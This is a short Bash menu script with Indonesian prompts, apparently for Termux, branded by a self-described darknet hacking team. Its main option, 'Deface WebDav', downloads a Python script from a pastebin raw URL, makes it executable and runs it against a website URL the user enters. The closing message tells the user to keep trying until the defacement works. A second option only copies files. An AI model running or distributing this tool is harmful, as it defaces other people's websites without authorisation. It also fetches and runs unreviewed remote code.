#!/bin/bash
clear
echo "########################"
echo "# Code By Mr 4n0nsr00T #"
echo "#                      #"
echo "# Santri Salafy Cyber  #"
echo "# Security Darknet     #"
echo "# One Squad Team       #"
echo "########################"
echo "# 01 Deface WebDav     #"
echo "# 02 Exit              #"
echo "# 03 Mindah File       #"
echo "########################" 

read -p "Pilih~Nomor=#: " n;

if [ $n = 01 ] || [ $n = 1 ];then
clear
mkdir webdav
cd webdav
pkg install curl
pkg install python2
pkg install openssl curl
pkg install libcurl
pip2 install urllib3 chardet certifi idna requests
curl -LO https://pastebin.com/raw/HnVyQPtR
mv HnVyQPtR webdav.py
chmod 777 webdav.py
read -p "Nama_SC~#: " sc;
read -p "Nama_Url~#: " url;
python2 webdav.py $sc $url
echo "Coba Cek Situsnya Kalau Gagal jgn 
menyerah! , Coba Lagi Sampai Bisa asalkan 
ada Niatnya"
fi

if [ $n = 02 ] || [ $n = 2 ];then
clear
echo "Terima Kasih Telah Menggunakan Tools 
Saya :)"

clear

echo "Wassalammualaikum warahmatullahi 
wabarakatuh"

fi

if [ $n = 03 ] || [ $n = 3 ];then
clear
echo "Memindahkan File Dari Folder Menuju 
Folder Lain"
read -p "Nama_Folder~#: " f;
cd $f

read -p "Nama-Folder~#: " c;

read -p "Nama_File~#: " file;
cp $file  $HOME/$c
echo "Coba Cek!"
fi
